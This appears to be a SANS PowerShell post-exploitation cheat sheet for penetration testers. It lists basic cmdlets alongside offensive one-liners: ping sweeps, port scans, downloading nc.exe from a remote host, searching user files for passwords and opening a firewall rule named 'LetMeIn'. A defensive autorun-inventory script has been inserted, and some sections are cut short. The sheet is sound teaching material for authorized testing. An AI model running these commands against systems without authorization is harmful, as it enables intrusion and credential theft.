PowerShell for Pen-Tester Post-Exploitation Cheat Sheet v. 4.0
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
The purpose of this cheat sheet is to describe some common options and techniques for use in Microsoft's PowerShell.

PowerShell Overview

PowerShell Background
PowerShell is the successor to command.com, cmd.exe and cscript. Initially released as a separate download, it is now built into all modern versions of Microsoft Windows. PowerShell syntax takes the form of verb-noun patterns implemented in cmdlets.

Launching PowerShell
PowerShell is accessed by pressing Start -> typing powershell and pressing Enter. Some operations require administrative privileges and can be accomplished by launching PowerShell as an elevated session. You can launch an elevated PowerShell by pressing Start -> typing powershell and pressing Shift-CTRL-Enter. Additionally, PowerShell cmdlets can be called from cmd.exe by typing: powershell -c "

Useful Cmdlets (and aliases)

Get a directory listing (ls, dir, gci):
    PS C:\> Get-ChildItem
Copy a file (cp, copy, cpi):
    PS C:\> Copy-Item src.txt dst.txt
Move a file (mv, move, mi):
    PS C:\> Move-Item src.txt dst.txt
Find text within a file:
    PS C:\> Select-String -path c:\users\*.txt -pattern password
    PS C:\> ls -r c:\users -file | % {Select-String -path $_ -pattern password}
Display file contents (cat, type, gc):
    PS C:\> Get-Content file.txt
Get present directory (pwd, gl):
    PS C:\> Get-Location
Get a process listing (ps, gps):
    PS C:\> Get-Process
Get a service listing:
    PS C:\> Get-Service
Formatting output of a command (Format-List):
    PS C:\> ls | Format-List -property name
Paginating output:
    PS C:\> ls -r | Out-Host -paging
Get the SHA1 hash of a file:
    PS C:\> Get-FileHash -Algorithm SHA1 file.txt
Exporting output to CSV:
    PS C:\> Get-Process | Export-Csv procs.csv

Post-Exploitation PowerShell

Conduct a ping sweep:
    PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}
Conduct a port scan:
    PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
Fetch a file via HTTP (wget in PowerShell):
    PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe")
Find all files with a particular name:
    PS C:\> Get-ChildItem "C:\Users\" -recurse -include *passwords*.txt
Get a listing of all installed Microsoft Hotfixes:
    PS C:\> Get-HotFix
Navigate the Windows registry:
    PS C:\> cd HKLM:\
    PS HKLM:\> ls
List programs set to start automatically in the registry:
    PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run
Convert string from ASCII to Base64:
    PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("PS FTW!"))
List and modify the Windows firewall rules:
    PS C:\> Get-NetFirewallRule -all
    PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -RemoteAddress 10.10.10.25
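As an added example (not part of the SANS sheet), the script below combines the Run-key lookup, Get-FileHash and Export-Csv entries above into a defender's autorun inventory: it enumerates the HKLM/HKCU Run and RunOnce keys, resolves each command line to its executable (quoted, unquoted-with-arguments and %ENV% forms), hashes it, flags entries whose file is missing, and writes a CSV baseline to diff against later. It assumes Windows PowerShell 5.1 or later and read access to the four keys listed; the function names Get-AutorunExecutable and Get-AutorunInventory are my own, not cmdlets.

```powershell
# Added example (not from the SANS sheet): inventory the Run/RunOnce autoruns,
# resolve each command line to its executable, hash it, and export a CSV baseline.
# Assumes Windows PowerShell 5.1+ (Get-FileHash) and read access to the keys below.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Properties Get-ItemProperty adds to every result; they are not autorun entries
$metaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
# Extract the executable path from an autorun command line. Handles
#   "C:\Program Files\App\app.exe" /flag   (quoted path plus arguments)
#   C:\Tools\tool.exe -x                   (unquoted path plus arguments)
#   %ProgramFiles%\App\app.exe             (environment variables)
function Get-AutorunExecutable {
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ([string]::IsNullOrWhiteSpace($cmd)) { return $null }
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 0) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted: grow the candidate path one word at a time until it exists on disk
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]   # nothing matched; report the first token as-is
}
function Get-AutorunInventory {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $entries = (Get-ItemProperty -Path $key).PSObject.Properties |
            Where-Object { $_.Name -notin $metaProps }
        foreach ($e in $entries) {
            $exe  = Get-AutorunExecutable -CommandLine ([string]$e.Value)
            $hash = if ($exe -and (Test-Path -LiteralPath $exe -PathType Leaf)) {
                        (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
                    } else { 'FILE NOT FOUND' }   # dangling entry: worth a closer look
            [pscustomobject]@{ Key = $key; Name = $e.Name; Command = $e.Value
                               Executable = $exe; SHA256 = $hash }
        }
    }
}
$inventory = Get-AutorunInventory
$inventory | Export-Csv -NoTypeInformation autoruns.csv   # keep as a baseline to diff later
$inventory | Format-Table Name, Executable, SHA256 -AutoSize
```

Run it again after a change window (or on a second host) and compare the two CSVs with Compare-Object; a new entry, a changed hash or a FILE NOT FOUND row is what a persistence review is looking for.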
Syntax
Cmdlets are small scripts that follow a dash-separated verb-noun convention such as "Get-Process".

Similar Verbs with Different Actions:

Getting Help

To get help with help:
    PS C:\> Get-Help
To read cmdlet self documentation:
    PS C:\> Get-Help [cmdlet]
To expand an alias into a full name:
    PS C:\> alias
To get a list of all available cmdlets:
    PS C:\> Get-Command
Get-Command supports filtering. To filter cmdlets

Efficient PowerShell

Tab completion:
    PS C:\> get-child
Creating and listing variables:

5 PowerShell Essentials

Concept                              | What's it Do?          | A Handy Alias
PS C:\> Get-Help [cmdlet] -examples  | Shows help & examples  | PS C:\> help [cmdlet] -examples

Where-Object condition (alias where or ?):
    PS C:\> Get-Process | Where-Object
Range operator and ForEach-Object loop (alias %):
    PS C:\> 1..10
    PS C:\> 1..10 | % {echo "Hello!"}